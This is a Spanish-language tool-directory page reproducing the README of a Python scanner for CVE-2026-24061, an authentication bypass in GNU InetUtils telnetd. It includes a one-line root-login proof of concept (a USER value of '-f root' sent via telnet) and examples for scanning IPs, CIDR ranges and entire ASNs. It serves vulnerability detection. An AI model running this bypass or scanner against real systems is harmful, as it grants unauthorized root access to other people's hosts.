Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - Omisión de autenticación remota en Telnetd de GNU InetUtils | Kitploit
Herramientas/GitHubGitHub/madfxr/twenty-three-scanner
ReconocimientoEscáneres de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - Omisión de autenticación remota en Telnetd de GNU InetUtils

Ver Repositorio
4hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛰️ Twenty-Three Scanner

Un escáner Potente, Rápido y Elegante para detectar servicios Telnetd vulnerables afectados por CVE-2026-24061. Construido con la biblioteca estándar pura de Python - cero dependencias externas requeridas.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 Tabla de Contenidos

  • ⚖️ Licencia
  • 🧩 Características
  • ☣️ Detalles de la Vulnerabilidad
    • ⚡ Estado del Servicio
    • 🧪 Prueba de Concepto (PoC)
    • 💥 Versiones Afectadas
    • 🧵 Versiones Parcheadas
    • ⚔️ Vector de Ataque
    • 🚨 Puntuación CVSS
  • 🛠️ Instalación
  • 📜 Uso
  • 🎯 Ejemplos
  • ⚗️ Demostraciones
  • 📖 Referencias

🧩 Características

  • 🚀 Escaneo de Alto Rendimiento – Arquitectura Multi-Hilo con Número de Hilos Configurable.
  • 🌐 Entrada de Objetivos Flexible – Soporte para IPs Individuales, Rangos CIDR, Búsquedas ASN y Listas Basadas en Archivos.
  • 📊 Progreso en Tiempo Real – Interfaz Hermosa Basada en Unicode con Barras de Progreso en Vivo.
  • 🤖 Inteligencia ASN – Obtención Automática de Prefijos desde las APIs de RADB, BGPView y HackerTarget.
  • 🌍 Inteligencia de Ubicación Geográfica – Obtención en Tiempo Real de ASN, Proveedor y Ubicación desde la API de ipapi.
  • 💾 Interrupción Elegante – Manejo de CTRL+C con Guardado Automático de Resultados.
  • 📝 Registro Detallado – Niveles de Verbosidad Configurables para Depuración.
  • 🛡️ Escaneo Seguro – Límites Integrados para Prevenir Escaneos Masivos Accidentales.
  • 🎨 Salida Limpia – Tablas Profesionales con Bordes y Resúmenes de Escaneo.
  • 📦 Cero Dependencias – Solo Biblioteca Estándar Pura de Python 3.x.

☣️ Detalles de la Vulnerabilidad

CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en Telnetd de GNU InetUtils que permite a atacantes remotos no autenticados obtener acceso root explotando el manejo de la opción NEW-ENVIRON.


⚡ Estado del Servicio

El siguiente es el estado de configuración del servicio Telnetd en el lado del host objetivo.

image


🧪 Prueba de Concepto (PoC)

Y aquí está la Prueba de Concepto (PoC) para esta vulnerabilidad, que puede ejecutarse manualmente desde el host del atacante simplemente ejecutando el comando USER="-f root" telnet -a <TARGET_HOST> 23.

image


💥 Versiones Afectadas

  • GNU InetUtils >=1.9.3 <=2.7.
  • Varias distribuciones embebidas de Linux.
  • Dispositivos IoT con implementaciones vulnerables de Telnetd.

🧵 Versiones Parcheadas

  • GNU InetUtils >=2.8.

⚔️ Vector de Ataque

La vulnerabilidad explota la validación incorrecta de la variable de entorno USER en la negociación de la opción NEW-ENVIRON (RFC 1572) de telnet, permitiendo a los atacantes inyectar valores maliciosos como -f root para omitir la autenticación.


🚨 Puntuación CVSS

9.8 (Crítico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ Instalación

root@kitploit:~
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 Uso

El siguiente es un manual para la herramienta Twenty-Three Scanner que puede usarse para detectar la vulnerabilidad CVE-2026-24061 - Omisión de Autenticación Remota en Telnetd de GNU InetUtils.

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

🎯 Ejemplos

Y aquí hay algunos ejemplos de cómo usar el comando.

root@kitploit:~
  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ Demostraciones

Escaneo de una Dirección IP Individual con Múltiples Puertos.

image

Escaneo de Múltiples Direcciones IP con un Puerto Individual.

image

Escaneo de un Rango CIDR con un Puerto Individual.

image

Escaneo de ASN con Múltiples Puertos.

image

Escaneo de una Dirección IP Individual, Múltiples Direcciones o un Rango CIDR desde un Archivo, y un Puerto Individual con Hilos y Salida Personalizados.

image


📖 Referencias

  • Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
  • NVD - CVE-2026-24061
  • CVE Record: CVE-2026-24061
  • Inetutils - GNU network utilities
  • [SECURITY] [DLA 4453-1] inetutils security update
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnet
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
Descargar herramienta